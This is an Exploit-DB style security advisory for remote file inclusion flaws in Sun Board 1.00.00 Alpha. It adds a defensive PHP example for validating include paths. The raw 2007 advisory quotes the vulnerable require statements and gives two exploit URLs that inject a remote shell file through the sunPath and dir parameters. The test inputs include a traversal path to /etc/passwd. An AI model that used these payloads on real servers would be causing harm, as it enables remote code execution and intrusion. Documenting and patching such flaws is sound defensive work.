Vendor: Sun Board
By: GoLd_M = [Mahmood_ali]
CVSS: 5.5 (MEDIUM)
Type: Remote File Inclusion
CWE: 98
Product Name: Sun Board
Affected Version From: 1.00.00 Alpha
Affected Version To: 1.00.00 Alpha
Patch Exists: NO
Related CWE: Not Available
CPE: Not Available
Platforms Tested: Not Available
Year: 2007

Sun Board 1.00.00 Alpha Multiple Remote File Inclusion Vulnerabilities

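Sun Board 1.00.00 Alpha builds the paths for its require and require_once calls from variables that can be set in the query string: sunPath in /include.php and dir in /skin/board/default/doctype.php. This allows an attacker to include remote files into the application, which can lead to remote code execution or information disclosure.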

Mitigation:

To mitigate this vulnerability, sanitize user input and validate file paths before passing them to require or require_once.
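
One way to apply this mitigation to the two require statements quoted in the raw advisory data, as an added example that is not Sun Board code: the base path is fixed from the file's own location, the database driver is checked against an allowlist, and every path is resolved and confirmed to sit under the application root before it is loaded. SUN_ROOT, SUN_DB_DRIVERS, sun_resolve() and sun_db_driver() are hypothetical names, and the driver list is assumed.

```php
<?php
// Added example, not Sun Board source. SUN_ROOT, SUN_DB_DRIVERS, sun_resolve()
// and sun_db_driver() are hypothetical names.

// Base path comes from the file's own location, never from the request.
define('SUN_ROOT', realpath(__DIR__) . DIRECTORY_SEPARATOR);

// Assumed driver list; the real set is whatever ships under dbms/.
const SUN_DB_DRIVERS = ['mysql', 'pgsql'];

// Map a relative path to an existing file under SUN_ROOT, or throw.
function sun_resolve(string $relative): string
{
    // Reject URL and stream-wrapper schemes (http://, ftp://, php://, data:) and NUL bytes.
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $relative) || strpos($relative, "\0") !== false) {
        throw new InvalidArgumentException('scheme or NUL byte in include path');
    }
    // realpath() collapses ../ and symlinks; false means the file does not exist.
    $real = realpath(SUN_ROOT . $relative);
    if ($real === false || strncmp($real, SUN_ROOT, strlen(SUN_ROOT)) !== 0) {
        throw new InvalidArgumentException('include path escapes application root');
    }
    return $real;
}

// $dbtype is only compared against the allowlist, never concatenated unchecked.
function sun_db_driver(string $dbtype): string
{
    if (!in_array($dbtype, SUN_DB_DRIVERS, true)) {
        throw new InvalidArgumentException('unknown database driver');
    }
    return 'dbms' . DIRECTORY_SEPARATOR . $dbtype . '.php';
}

// Constructed inputs: this script itself, then values shaped like request-supplied paths.
$samples = [basename(__FILE__), 'http://example.invalid/x.txt?', '../../etc/passwd'];
foreach ($samples as $candidate) {
    try {
        echo 'ok       ', sun_resolve($candidate), PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo 'rejected ', $candidate, ' (', $e->getMessage(), ')', PHP_EOL;
    }
}
echo sun_db_driver('mysql'), PHP_EOL;
```

In include.php the two statements would become require sun_resolve('config.php'); and require_once sun_resolve(sun_db_driver($dbtype));. Keeping allow_url_include = Off in php.ini (its default value) blocks URL includes at the interpreter level as well.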

Exploit-DB raw data:

# Sun Board 1.00.00 Alpha Multiple Remote File Inclusion Vulnerabilities

# D.Script :
      http://mesh.dl.sourceforge.net/sourceforge/sunboard/sunboard.zip

# V.Code :
      require $sunPath.'config.php';
      require_once $sunPath.'dbms/'.$dbtype.'.php';
# In :
      /include.php

# Exploits :
      /include.php?sunPath=Shell.txt?

# V.Code 2 :
      <?php require_once $dir.'/lib.php'; ?>

# In :
      /skin/board/default/doctype.php

# Exploits 2 :
      /skin/board/default/doctype.php?dir=Shell.txt?

# Discovered by:
      GoLd_M = [Mahmood_ali]

# Homepage:
      http://www.Tryag.Com/cc

# Sp.Thanx To :
      Tryag-Team & Asb-May's Group

# milw0rm.com [2007-06-22]